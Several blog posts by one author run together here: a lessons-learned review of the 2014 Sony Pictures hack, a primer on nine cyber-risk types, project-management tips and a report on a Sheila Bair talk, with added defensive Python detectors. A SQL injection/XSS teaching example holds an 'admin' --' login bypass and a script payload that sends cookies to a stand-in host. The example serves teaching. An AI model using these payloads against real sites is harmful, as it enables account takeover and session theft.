Lessons Learned From the Sony Hack

This article reviews the 2014 Sony Pictures hack from a strengths and weaknesses standpoint, using selected parts of the SANS (SysAdmin, Audit, Network, Security) Critical Security Controls and the National Institute of Standards and Technology (NIST) Cybersecurity Framework.  Although it is an older hack, the lessons learned here are still relevant today.

Strengths – A Track Record of Innovation and Multilayered Information Security:
From the boom-boxes and portable disc players of the 1980s and 1990s to high-quality headphones and speakers, early HD TVs, a gaming revolution called the PlayStation, and now a massive online gaming network, Sony has been creative and innovative.  This has made it one of the most respected and profitable Japanese companies to date.  Yet that success bred overconfidence in other areas, information security included, even though Sony still has the talent and the money to be a security leader.  The managerial layering of Sony’s information security team was a good start, even if the head count was too low.  One source stated, “Three information security analysts are overseen by three managers, three directors, one executive director and one senior vice president” (Hill, 2014).  Although that ratio is inverted (eight managers for three analysts), at least there was some oversight.

Failure 1 – Poor Culture and Lack of Leadership Support:
Sony’s leadership is on the record as not respecting the recommendations of either internal or external auditors.  An I.T. risk consultancy summarized it this way: “The Executive Director of Information Security talked auditors out of reporting failures related to Access Controls which would have resulted in Sony being SOX (Sarbanes-Oxley) non-compliant in 2005” (Risk3sixty LLC, 2014).  Behavior like this trickles down the layers of management and becomes part of the company culture.  Specifically, low-level whistleblowers were silenced even though their I.T. risk arguments were solid: “Sony’s own employees complained that the network security was a joke” (Risk3sixty LLC, 2014).  In doing so Sony’s leaders failed in their fiduciary duty to the board, shareholders, and customers.  They avoided looking bad in the short term, and it cost the company far more in the long term.

Failure 2 – Not Understanding Their Baseline:
The baseline is the measure of how much security and security process you need relative to your business objectives and risk tolerance.  Being below the baseline means risk is too high and an attack or breach is likely.  Because the objectives and the threat environment change, the baseline changes too and needs to be closely monitored.  For example, when you are producing a politically controversial movie about a volatile world leader with a history of threatening war against his opponents, you should raise your baseline and be on guard for hacktivists.  Sony focused on its cash-generating core competencies, and security was at most an afterthought.  According to one source, Sony Pictures had just 11 people on a top-heavy information security team out of 7,000 total employees (Hill, 2014).  For a technology company that is far too few.  It is not enough people to collect and intelligently review logs, patch software, pen test, red team, and staff the one or more war-room projects that are bound to come up, all things prudent security requires.

Understanding your I.T. risk baseline requires testing and measurement against some framework: SANS, NIST, or one of the others.  One former employee described Sony’s failure to follow any framework as follows: “The real problem lies in the fact that there was no real investment in or real understanding of what information security is.  One issue made evident by the leak is that sensitive files on the Sony Pictures network were not encrypted internally or password-protected” (Hill, 2014).  Had they conformed to the SANS controls or the NIST framework they would have been required to encrypt that data; see the conclusion.

Failure 3 – Weak Password Policies:
Sony’s password policy was embarrassingly weak, so weak you might think they were deliberately helping the attackers.  “Employees kept plaintext passwords in Microsoft Word documents” (Franceschi-Bicchierai, 2014).  Even very small companies in the 1990s had policies against that.  Moreover, one source confirmed that the Word files had “password” in the file name (Risk3sixty LLC, 2014).  Once inside the network, all an attacker has to do is search the file shares for a file with “password” in the name, and they have it.  The right place for those credentials is a password manager or vault that is itself protected by multi-factor authentication; the right control for the file shares is a periodic scan for exactly this kind of file.
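As an added example (not code from the original post), here is a small scanner of the kind a security team could point at a file share to find exactly this: files whose name or contents look like a credential store.  It handles plain text and .docx (which is zipped XML) and runs against a constructed sample tree; the file names, contents and patterns are assumptions for the demo.

```python
"""Credential-file hunt: added example, not code from the original post.

Flags files on a share whose NAME contains a credential-ish word (the case the
post describes) or whose CONTENT has a line like "password = Welcome1".
The sample tree built by build_demo_tree() is constructed for the demo."""
import os
import re
import tempfile
import zipfile

# A file name like "Passwords.txt" or "vpn_credentials.xlsx" is a signal by itself.
NAME_PATTERN = re.compile(r"password|passwd|pwd|credential|secret", re.IGNORECASE)
# A line like "password = Welcome1" or "pwd: hunter2" inside the file is the stronger signal.
CONTENT_PATTERN = re.compile(
    r"^\s*(?:password|passwd|pwd|pass|secret|api[_-]?key)\s*[:=]\s*\S+",
    re.IGNORECASE | re.MULTILINE,
)
TAG = re.compile(r"<[^>]+>")


def read_text(path, max_bytes=1_000_000):
    """Text of a plain file, or the body text of a .docx (a zip holding word/document.xml)."""
    if path.lower().endswith(".docx"):
        with zipfile.ZipFile(path) as zf:
            xml = zf.read("word/document.xml").decode("utf-8", errors="ignore")
        return TAG.sub("\n", xml)  # strip markup so each <w:t> text run lands on its own line
    with open(path, "rb") as fh:
        return fh.read(max_bytes).decode("utf-8", errors="ignore")


def scan_tree(root):
    """Return sorted (relative_path, reason) pairs for files that look like credential stores."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if NAME_PATTERN.search(name):
                findings.append((rel, "name"))
                continue  # one reason per file is enough for triage
            try:
                text = read_text(path)
            except (OSError, zipfile.BadZipFile, KeyError):
                continue  # unreadable or not really a docx: skip, do not crash the sweep
            if CONTENT_PATTERN.search(text):
                findings.append((rel, "content"))
    return sorted(findings)


def build_demo_tree():
    """Constructed sample share: two credential stores and two benign files."""
    root = tempfile.mkdtemp(prefix="credhunt_")
    os.makedirs(os.path.join(root, "HR"))
    with open(os.path.join(root, "Passwords.txt"), "w") as fh:
        fh.write("vpn: jsmith / Summer2014!\n")  # flagged by name
    with zipfile.ZipFile(os.path.join(root, "HR", "benefits_vendor.docx"), "w") as zf:
        zf.writestr("word/document.xml",  # flagged by content
                    "<w:document><w:t>Vendor portal</w:t><w:t>password = Welcome1</w:t></w:document>")
    with open(os.path.join(root, "HR", "budget_2015.txt"), "w") as fh:
        fh.write("Q1 marketing spend: 1,200,000\n")  # benign
    with open(os.path.join(root, "readme.txt"), "w") as fh:
        fh.write("Password policy: rotate every 90 days.\n")  # mentions the word, holds no value
    return root


if __name__ == "__main__":
    for rel, reason in scan_tree(build_demo_tree()):
        print(f"{reason:8s} {rel}")
```

The name match is the cheap signal the post describes; the content match catches the more common case where the file is called something innocent.  On a real share you would extend read_text to other Office formats and throttle the walk so the scan does not look like exfiltration itself.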

Failure 4 – Late Detecting the Hack and Data Exfiltration:
Right away the intruders walked into Sony’s internal network and began stealing unencrypted sensitive data with apparently no log alarms going off.  Sony had not followed data classification, retention, or governance plans, not even at the checkbox-compliance level.  If it had, it would not have had all types of data mixed together.  One reporter described it this way: “Intruders got access to movie budgets, salary information, Social Security numbers, health care files, unreleased films, and more” (Hill, 2014).  Thus their network segmentation must have been weak or non-existent.  Health care data should not sit next to unreleased film files; they are totally different, and there is no business justification for it.  Segmenting and encrypting the data would have reduced and delayed the theft, with one caveat: encryption at rest only helps if the compromised accounts do not also hold the keys, which is why egress monitoring that notices an unusual volume leaving the network in the middle of the night is the control that actually shortens the detection window.
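As an added example (not code from the original post), the following script shows the kind of log review Sony’s team did not have the staff to do: it parses constructed firewall egress records, sums bytes out per internal host per hour, and flags any hour that is either above an absolute floor or more than ten times that host’s median for its other hours, noting whether it happened off-hours.  The record format, IP addresses, thresholds and the log lines themselves are assumptions for the demo.

```python
"""Egress-volume baseline check: added example, not code from the original post.

Parses constructed firewall/proxy egress records, sums bytes out per internal
host per hour, and flags hours far above that host's own baseline."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Assumed record format: "<iso-timestamp> src=<ip> dst=<ip> bytes_out=<n>"
LINE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) bytes_out=(?P<bytes>\d+)$")

# Constructed sample: one host with ordinary daytime traffic and a ~1.5 GB burst
# to a new destination at 2 a.m., and one host with nothing unusual.
SAMPLE_LOG = """\
2014-11-20T09:15:00 src=10.1.4.22 dst=203.0.113.9 bytes_out=2100000
2014-11-20T10:40:00 src=10.1.4.22 dst=203.0.113.9 bytes_out=1800000
2014-11-20T14:05:00 src=10.1.4.22 dst=198.51.100.7 bytes_out=2500000
2014-11-20T16:30:00 src=10.1.4.22 dst=203.0.113.9 bytes_out=1900000
2014-11-21T02:13:00 src=10.1.4.22 dst=192.0.2.77 bytes_out=734003200
2014-11-21T02:48:00 src=10.1.4.22 dst=192.0.2.77 bytes_out=812000000
2014-11-20T09:00:00 src=10.1.7.5 dst=203.0.113.9 bytes_out=1500000
2014-11-20T11:00:00 src=10.1.7.5 dst=203.0.113.9 bytes_out=1600000
2014-11-20T13:00:00 src=10.1.7.5 dst=203.0.113.9 bytes_out=1400000
2014-11-21T03:00:00 src=10.1.7.5 dst=203.0.113.9 bytes_out=1700000
"""


def parse(log_text):
    """Return (timestamp, src, dst, bytes_out) tuples; malformed lines are skipped."""
    records = []
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if m:
            records.append((datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["bytes"])))
    return records


def hourly_totals(records):
    """{src: {hour_start: bytes_out}} summed over every record in that hour."""
    totals = defaultdict(lambda: defaultdict(int))
    for ts, src, _dst, nbytes in records:
        totals[src][ts.replace(minute=0, second=0, microsecond=0)] += nbytes
    return totals


def find_exfil(records, ratio=10.0, floor=100_000_000):
    """Flag (src, hour) buckets whose outbound volume exceeds an absolute floor or
    is more than `ratio` times the host's median for its other hours.  Using the
    other hours as the baseline keeps a single huge hour from inflating its own baseline."""
    alerts = []
    for src, buckets in hourly_totals(records).items():
        for hour, nbytes in sorted(buckets.items()):
            others = [v for h, v in buckets.items() if h != hour]
            baseline = median(others) if others else 0
            spike = baseline > 0 and nbytes > ratio * baseline
            if nbytes > floor or spike:
                alerts.append({
                    "src": src,
                    "hour": hour.isoformat(),
                    "bytes_out": nbytes,
                    "x_baseline": round(nbytes / baseline, 1) if baseline else None,
                    "off_hours": hour.hour < 6 or hour.hour >= 20,  # assumed business day 06:00-20:00
                })
    return alerts


if __name__ == "__main__":
    for alert in find_exfil(parse(SAMPLE_LOG)):
        print(alert)
```

In production the baseline would come from weeks of history rather than the same day, and the destination (a never-before-seen external address, as in the sample) would be a second feature; the point is that a check this simple already separates the 2 a.m. burst from normal traffic.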

Conclusion:
[Image: SANS top 3 critical controls applied to Sony]
[Image: NIST Cybersecurity Framework applied to Sony]

References:
Baker, L., & Finkle, J.  “Sony PlayStation suffers massive data breach”.  Reuters.  Published 04/26/11.  Viewed 10/26/16.  http://www.reuters.com/article/2011/04/26/us-sonystoldendata-idUSTRE73P6WB20110426

Franceschi-Bicchierai, Lorenzo.  “Don’t believe the hype: Sony hack not ‘unprecedented,’ experts say.”  Mashable.  Published 12/08/14.  Viewed 10/20/16.  http://mashable.com/2014/12/08/sony-hack-unprecedented-undetectable/#359BD06aEkq6

Greene, Tim.  “SANS: 20 critical security controls you need to add.”  Network World.  Published 10/13/15.  Viewed 10/23/16.  http://www.networkworld.com/article/2992503/security/sans-20-critical-security-controls-you-need-to-add.html

Hill, Kashmir.  “Sony Pictures hack was a long time coming, say former employees”.  Published 12/04/14.  Viewed 10/20/16.  http://fusion.net/story/31469/sony-pictures-hack-was-a-long-time-coming-say-former-employees/

NIST.  “Framework for Improving Critical Infrastructure Cyber Security”.  Published 01/01/2016.  Viewed 10/23/16.  https://www.nist.gov/sites/default/files/documents/cyberframework/Cybersecurity-Framework-for-FCSM-Jan-2016.pdf

Risk3sixty. “The Sony Hack – Security Failures and Solutions.”  Published 12/19/14.  Viewed 10/20/16. http://www.risk3sixty.com/2014/12/19/the-sony-hack-security-failures-and-solutions/

Sanchez, Gabriel.  “Case Study: Critical Controls that Sony Should Have Implemented”.  SANS Institute InfoSec Reading Room.  Published 06/01/2015.  Viewed 10/20/16.  https://www.sans.org/reading-room/whitepapers/casestudies/case-study-critical-controls-sony-implemented-36022

Demystifying 9 Common Types of Cyber Risk

1) Crimeware
Crimeware is malware designed to obtain financial gain from the infected user or from third parties, by emptying bank accounts, harvesting and selling confidential data, and so on.  An infection most often starts with social engineering that gets the victim to run or install the software; the infected machines are then controlled through botnets of compromised (“zombie”) computers in distant places, which hide the fraudster’s IP (Internet Protocol) address.  Usually the victim does not know they have crimeware on their computer until they start to see unfamiliar bank charges or an I.T. professional points it out.  One common form, scareware, masquerades as a real-looking antivirus product that demands your credit card details, which are then used for fraud.

2) Cyber-Espionage
The term generally refers to malware that clandestinely observes or steals data from the computer systems of government agencies and large enterprises: unauthorized spying by computer, tablet, or phone.  Antivirus maker Symantec described one noteworthy example, the Stuxnet worm, which is widely attributed to the U.S. government and was built to sabotage the centrifuges at Iran’s uranium enrichment facility, arguably in the name of international security (Fig. 1).  Strictly speaking Stuxnet was sabotage rather than espionage, but it shows what a state-funded operation against a specific target looks like.

“Stuxnet is a computer worm that targets industrial control systems that are used to monitor and control large scale industrial facilities like power plants, dams, waste processing systems and similar operations. It allows the attackers to take control of these systems without the operators knowing. This is the first attack we’ve seen that allows hackers to manipulate real-world equipment, which makes it very dangerous. It’s like nothing we’ve seen before – both in what it does, and how it came to exist. It is the first computer virus to be able to wreak havoc in the physical world. It is sophisticated, well-funded, and there are not many groups that could pull this kind of threat off. It is also the first cyberattack we’ve seen specifically targeting industrial control systems” (Accessed 03/20/16, Norton Stuxnet Review).

Richard Clarke is the former National Coordinator for Security, Infrastructure Protection and Counter-terrorism for the United States, and he commented on Stuxnet and cyber war generally in this Economist interview from 2013.

Fig. 1.

3) Denial of Service (DoS) Attacks
A DoS attack attempts to deny legitimate users access to a resource, either by exploiting a bug in the target’s operating system or TCP/IP (Internet protocol) implementation that makes it crash, or, far more commonly today, by flooding it with more traffic than it can handle.  When the flood comes from a botnet of zombie computers in remote locations it is a distributed DoS, or DDoS (Fig. 2).  Each bot sends a stream of traffic, such as TCP connection requests, at the target host, usually a server or router (Fig. 3).  Because the target spends its bandwidth, connection table, CPU or disk on the junk traffic, it is unable to process legitimate requests, and may crash or drop off the Internet from resource exhaustion.  In some cases the damage is minor, because once you restart the crashed computer everything is back on track; in others it is a disaster, especially when you run a corporate network or an ISP (Internet service provider).
Fig. 2. Botnet image.  Fig. 3. TCP image.
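As an added example (not code from the original post), here is a minimal half-open connection detector of the sort an IDS uses for SYN floods: a SYN that is not followed by an ACK from the same source within the window counts as half-open, and a destination that accumulates a threshold number of them inside one window is flagged, along with how many distinct sources were involved (a large count hints at spoofed addresses).  The packet summaries, addresses and thresholds are constructed for the demo.

```python
"""Half-open (SYN flood) detector: added example, not code from the original post.

Each event is (time_seconds, src_ip, dst_ip, flag) with flag "SYN" or "ACK";
the packet summaries are constructed for the demo.  A SYN with no ACK from the
same source within `window` seconds is half-open; a destination collecting
`threshold` half-open SYNs inside one window is flagged."""
from collections import defaultdict


def half_open_flood(events, window=1.0, threshold=50):
    acks = defaultdict(list)  # (src, dst) -> timestamps of ACKs seen
    for ts, src, dst, flag in events:
        if flag == "ACK":
            acks[(src, dst)].append(ts)

    half_open = defaultdict(list)  # dst -> [(ts, src)] for SYNs never completed
    for ts, src, dst, flag in events:
        if flag != "SYN":
            continue
        # Real code would also match on ports and sequence numbers; (src, dst) is enough here.
        if not any(ts <= a <= ts + window for a in acks[(src, dst)]):
            half_open[dst].append((ts, src))

    alerts = []
    for dst, syns in half_open.items():
        syns.sort()
        start = 0
        for end in range(len(syns)):
            while syns[end][0] - syns[start][0] > window:  # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                alerts.append({
                    "dst": dst,
                    "first_alert_at": syns[end][0],
                    "half_open": end - start + 1,
                    "distinct_src": len({s for _, s in syns[start:end + 1]}),
                })
                break  # one alert per destination is enough for the demo
    return alerts


def benign_handshakes(server="192.0.2.10"):
    """Constructed: 20 completed handshakes from five clients over ten seconds."""
    events, t = [], 0.0
    for i in range(20):
        src = f"10.0.0.{i % 5 + 1}"
        events.append((t, src, server, "SYN"))
        events.append((t + 0.01, src, server, "ACK"))
        t += 0.5
    return events


def syn_flood(server="192.0.2.10"):
    """Constructed: 200 SYNs in two seconds from 200 different (spoofed) sources, none completed."""
    return [(10.0 + i * 0.01, f"203.0.113.{i + 1}", server, "SYN") for i in range(200)]


if __name__ == "__main__":
    print(half_open_flood(benign_handshakes()))  # []
    print(half_open_flood(benign_handshakes() + syn_flood()))  # one alert
```

The same structure, with the counters kept in the kernel, is what SYN cookies and rate limiting react to on the server side; the detector here only answers the question of whether the flood is happening and how broad the source set is.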
4) Insider and Privilege Misuse
Server administrators, network engineers, outsourced cloud workers, developers, I.T. security staff, and database administrators are given privileges to access many or all parts of a company’s IT infrastructure.  Companies need these privileged users because they understand the source code, technical architecture, file systems and other assets they upgrade and maintain; yet that access is itself a security risk.

Because they can easily get around the controls that restrict non-privileged users, they sometimes abuse what should be temporary, task-scoped privileges.  This can put customer data, corporate trade secrets, and unreleased product information at risk.  Savvy companies implement multi-layered approvals for privileged access, monitoring of what that access is actually used for, multi-factor authentication, and a strict need-to-know policy with a clear oversight process.

5) Miscellaneous Errors
This is an employee or customer making an unintentional mistake that results in a partial or full breach of an information asset.  It does not include lost devices, which are grouped with theft, so this is a smaller category.  The 2014 Verizon Data Breach Investigations Report gives an example:

“Misdelivery (sending paper documents or emails to the wrong recipient) is the most frequently seen error resulting in data disclosure. One of the more common examples is a mass mailing where the documents and envelopes are out of sync (off-by-one) and sensitive documents are sent to the wrong recipient” (Accessed 02/21/16, Page 29).

6) Payment Card Skimmers
This is a method where thieves capture your card data at the card terminal, often at bars, restaurants and gas stations, sometimes at bank ATMs, and especially where there is low light, no camera, or anything else to discourage tampering with the terminal.

Corrupt employees can keep a skimmer stashed out of sight, or crooks can install hidden skimmers on a gas pump.  Skimmers are small devices that read and store the card data from the magnetic stripe (Fig. 4).  After the card is swiped through the skimmer the data is saved, and the crooks usually sell it on the Internet or, if they want more cover, on darknet markets reachable only through anonymity networks such as Tor.  Counterfeit cards are then made, bogus charges show up, and the bank eats the cost, which drives up the cost of banking for everyone else.  (Chip, or EMV, cards make a copied stripe far less useful, which is one reason for the chip migration.)  Some skimmers also have tiny cameras that record the PINs typed at ATMs for a more aggressive type of fraud (Fig. 5).  Here are two images of skimmer technologies:

Fig. 4. Card skimmer.  Fig. 5. Camera.

7) Physical Theft and Loss
This includes armed robbery, accidental loss, and any type of device or data that goes missing.  Some stolen or lost items never end up breached or used for fraud; whether they do depends on the device, what data is on it, whether that data was encrypted, and whether it could be wiped remotely.

8) Point of Sale Intrusions
See my 2014 post on the Target data breach for a good example.

9) Web App Attacks
These incidents are carried out primarily by exploiting input validation and authentication flaws in common content management systems like Joomla, Magento, Sitecore, WordPress, and Drupal.

According to the 2015 Verizon Data Breach Investigations Report these attacks are not only a reliable method for attackers but also fast, with 60% of compromises taking a few minutes or less (Accessed 02/21/16).  With web applications commonly serving as an organization’s public face to the Internet, the ease of exploiting web-based vulnerabilities is alarming (Accessed 02/21/16, 2015 Verizon Data Breach Investigations Report).  According to the Open Web Application Security Project (OWASP) these are two common types of web app weakness (Accessed 02/21/16, OWASP Top 10 2013, Most Critical Web Application Security Risks):

“i) Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

ii) XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping (Fig. 6).  XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites”.

Fig. 6. RXSS (reflected cross-site scripting).
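As an added example (not code from the original post or from OWASP), the following Python shows both weaknesses side by side: a login query built by string formatting that an attacker bypasses with the classic `admin' --` input, the parameterized query that defeats it, and a comment renderer that reflects input unescaped beside one that HTML-escapes it.  The users table, passwords and payload are made up for the demo, and the password hashing is simplified for brevity.

```python
"""SQL injection and XSS, vulnerable beside hardened: added example, not code
from the original post or from OWASP.  Users, passwords and payloads are made up."""
import hashlib
import html
import sqlite3


def _h(password):
    # Demo only: a real system uses a salted, slow hash (bcrypt, scrypt or Argon2).
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """In-memory users table with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", _h("correct horse battery staple")),
                      ("jsmith", _h("Summer2014!"))])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Untrusted input is pasted into the query text, so it can change the query itself."""
    query = ("SELECT username FROM users WHERE username = '%s' AND pw_hash = '%s'"
             % (username, _h(password)))
    # With username "admin' --" the query becomes
    #   ... WHERE username = 'admin' --' AND pw_hash = '...'
    # and everything after -- is a SQL comment: the password check is gone.
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized: the driver passes values separately, so input is only ever data."""
    row = conn.execute("SELECT username FROM users WHERE username = ? AND pw_hash = ?",
                       (username, _h(password))).fetchone()
    return row[0] if row else None


def render_comment_vulnerable(comment):
    """Reflects untrusted text straight into HTML: a <script> in the comment runs in the browser."""
    return '<p class="comment">%s</p>' % comment


def render_comment_safe(comment):
    """Escapes <, >, &, and quotes so the text is displayed, never interpreted as markup."""
    return '<p class="comment">%s</p>' % html.escape(comment, quote=True)


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "admin' --", "anything"))  # admin: password check bypassed
    print(login_safe(db, "admin' --", "anything"))  # None
    payload = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
    print(render_comment_vulnerable(payload))
    print(render_comment_safe(payload))
```

Note that the fix in each case is the same idea: keep data and code apart by handing the interpreter (SQL engine or browser) the untrusted value through a channel where it cannot be read as syntax.  Output escaping must match the context (HTML body, attribute, JavaScript, URL); html.escape covers only the first two.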
Jeremy Swenson, MBA, is a seasoned, Intel-certified retail technology marketing and training representative on assignment at Best Buy for clients including Intel, Trend Micro, Adobe, and others.  He also doubles as a senior business analyst and project management consultant.  Tweet to him @jer_Swenson.


Four PMBOK Inspired Tips For Success On Complicated Projects

1) Stakeholder Management: Get clear support from the executive stakeholders at the beginning of the project and schedule regular check-in meetings with them ahead of time, as they tend to be very busy and pulled in many directions.  Set the tone that their participation is needed and that they will have to approve change requests, which are not uncommon.  Use people skills and empathetic listening as you interview the many high-level stakeholders early in the project, to defuse conflict, get consensus on disagreements about scope, business goals and sequencing, and find out early who will be the thorn in your side; the sooner you know that the better.  Also accept that stakeholders will differ and may not even work directly for your company, which is fine, as those tend to offer specialized expertise and are often very creative.

2) Communications Management: It is common to have one or two stakeholders who are difficult: protesting the project through their actions, egotistical, or just plain hard to deal with.  As project manager, project consultant, or business analyst, it is your responsibility to handle these people and situations.  One way is to understand the communication styles of all project stakeholders early on and document them.  StrengthsFinder, DISC, and many other communication-style assessments can help, or you could consult someone with a lot of international travel experience; they are often good at reading group communication dynamics.  You should also know when to be direct, indirect, or silent.  Communication is mostly about listening and perception, and as project manager you are not the direct boss of the team members, so your ability to drive tasks rests heavily on your communication and motivational skills.  Ask every team member what you can do to clear their road, either yourself or in partnership with other stakeholders.  This reduces surprise roadblocks later and encourages quiet people to speak up.

3) Quality Management: Having worked on many complex projects in highly regulated industries over the last five years, I have noticed a shift toward agile methodologies and away from waterfall.  From my perspective this is really about quality and timely flexibility.  Breaking the project into small pieces lets you test the results independently and faster, and if a result is bad that is a good thing, because it is only one piece of the project and you get an early warning.  Yet to get better quality out of an error you need to have documented what went into it from beginning to end, and you need intelligent consensus.  On SDLC projects there will be many small errors, which raise questions about other systems and how they relate to the business rules.  With good process flows, screenshots, and JAD sessions with key people, you can make sure those errors are nothing more than normal bumps in the road.  Every project has its bumps; the real test is delivering above-average quality on budget and on time, creating a reusable plan others can learn from and be inspired by.

4) Risk Management: In this era where almost everything is in the cloud and attackers target large and mid-sized companies to steal and sell their data, every risk analysis document or plan should cover data security, customer privacy, and access controls for the project team, and there should be an independent audit plan, often out of scope for the project and run by a different group for checks and balances.  Every project touches data, sometimes more and sometimes less.  Question number one is who should have access to the data and at what point.  In today’s environment you should adopt a need-to-know policy and document it to reduce risk.  You should also imagine the worst-case scenario, be prepared for it, and run it by the executive project sponsors and the risk officer if your company has one.

Another common risk is project delay.  Have you analyzed how a one- or two-month delay would affect your critical path and logical task order?  For some projects it may not matter; for others it may cost millions more.  It may harm another department or a related project, so your project risk document should list the longest delay the project could absorb and the dependencies that delay affects.  Delays on projects, especially SDLC projects, do happen and are not necessarily bad; they can be dealt with, but the team needs to be ready and the sooner they know the better.

If you want to hire me to speak at your next event or consult for your company on these and related topics concerning project risk, process improvement, project management, and related areas please contact me.

Former FDIC Chair Sheila Bair Comments On Bank Bailouts, Peer-To-Peer Lending, And Tax Reform

On Tuesday, 04/08/14, former FDIC Chairperson Sheila Bair visited Minneapolis and offered commentary on the financial services industry, peer-to-peer lending, systemic risk, and the recent recession.  Bair was trained as an attorney, served as Assistant Secretary for Financial Institutions at the Treasury Department, and was a professor at the University of Massachusetts Amherst before she moved over to chair the FDIC from 2006 to 2011.  At the FDIC Bair helped steer the nation’s financial system through a severe recession and an unprecedented bank run from 2007 to 2010, though not without ruffling a few feathers.

Addressing a sold-out crowd that included former Congressman Tim Penny and other elected officials, business people, students, and ethically minded community members, Bair was the keynote speaker at Saint Mary’s University of Minnesota’s publicly broadcast Hendrickson Forum on Ethical Leadership.  Bair opened her keynote by describing how unimpressed she was that when she arrived at the FDIC in 2006 the organization had little to no information on sub-prime lending and had to buy a database to research it.  This was partly because sub-prime lenders were private and not deposit institutions, and thus slightly out of scope for the FDIC at that time.  Bair did not inherit a perfect FDIC, and it can be inferred that the FDIC should have been paying attention to sub-prime lending far sooner, as it was directly related to many things that affect deposit institutions, including real estate, entrepreneurship, income and tax, and community redevelopment.


Bair now free from the constraints of holding a Washington office spoke openly about how she felt hindered to speak to the human element of the financial crisis while at the FDIC.  She indicated that although she was a part of the team that brokered the historic bank bailouts (2008-2009), that she has some serious reservations about that, because it was “too generous and uneven” and “helped the banks far more than it helped homeowners and families”.  She also described regular disagreement with then Treasury Secretary Timothy Geithner and suggested he was too close to many of the bank executives who benefited from the bank bailouts.

She further described miscommunication and lack of collaboration as Geithner worked around her efforts at the FDIC, and the undertone of this was political disagreement over which agency should lead the recession resolution in terms of the banking industry.

At present, Bair supports the Dodd-Frank Act because it favors bankruptcy and a three-year claw back for executives over a bailout in the event of a bank failure.  Although Bair in the past has said she disagreed with Janet Yellen’s support to repeal the Glass-Steagall Act, she presently indicated she still supports the new Fed Chair and viewed her as a reliable Washington outsider.


When I directly questioned Bair on the growth of peer-to-peer lending she seemed cautious about its long-term viability citing an unknown regulatory landscape and even recounted that peer-to-peer lender Prosper lost many investors during the worst months of the recession.  In discussion with Bair I observed that she, like many banks, is in a wait and see mode with peer-to peer-lending, but she did indicate that for customers consolidating higher interest rate debt it can be a good thing and that could in turn force banks to be more customer centric with better terms.

Yet I am more optimistic on peer-to-peer lending than Bair, and so are many respected investors, including Google, which invested $125 million in Lending Club, and former Citigroup CEO Vikram Pandit.  It is telling when a former Citigroup CEO goes against his own industry in favor of a tech-heavy new lending model, but he is right, because most customers no longer need the big bank branches and elaborate, fee-heavy services.  Moreover, peer-to-peer lenders offer attractive rates, diverse portfolio options, and low operational costs, and that keeps investors and borrowers happy.  Just as online news slaughtered traditional print media, as soon as peer-to-peer lending gets more regulatory backing it will slaughter traditional fee-heavy banks if they do not adapt to this new environment.

Commenting on federal sequestration, Bair showed frustration and disagreement with the automatic spending-cut approach and instead suggested that tax rates be reduced and restructured in a number of areas to encourage more employment, keep businesses in the U.S., and encourage business innovation, which would in turn provide more income and employment and thus bring in more taxable income to offset her proposed tax reduction.  This truly can be a helpful aspect of the budget deficit issue, in that taxes in the U.S. are far too high and there are some needless loopholes that harm many and help few.  The 2.3% Medical Device Tax is an example: it encourages the many medical device companies in Minnesota to move their operations outside the U.S. because of the high tax cost, and it adds to their cost of doing business, reducing their ability to get favorable loans.

Lastly, as an advocate for consumer protection and creative thinking, I asked Bair whether she had any insight on what the massive Target data breach, in which an estimated 10-15% of the 40 million affected cards have seen some type of fraud, might mean for banking and related industries.  She reminded me that the banks take the losses before the retailer does.  Although she offered no specifics beyond suggesting that debit cards are more relevant, she shared my concern that data security is a growing factor in financial regulation; I was also reminded that Bair is more a politician and economist than a technologist.  From an economic policy standpoint, if the nation encounters more data breaches like this it could drive the cost of goods up, forcing more costly and secure card payment products, perhaps with biometrics.

Photos by Rick Busch.

Written by Jeremy Swenson (c)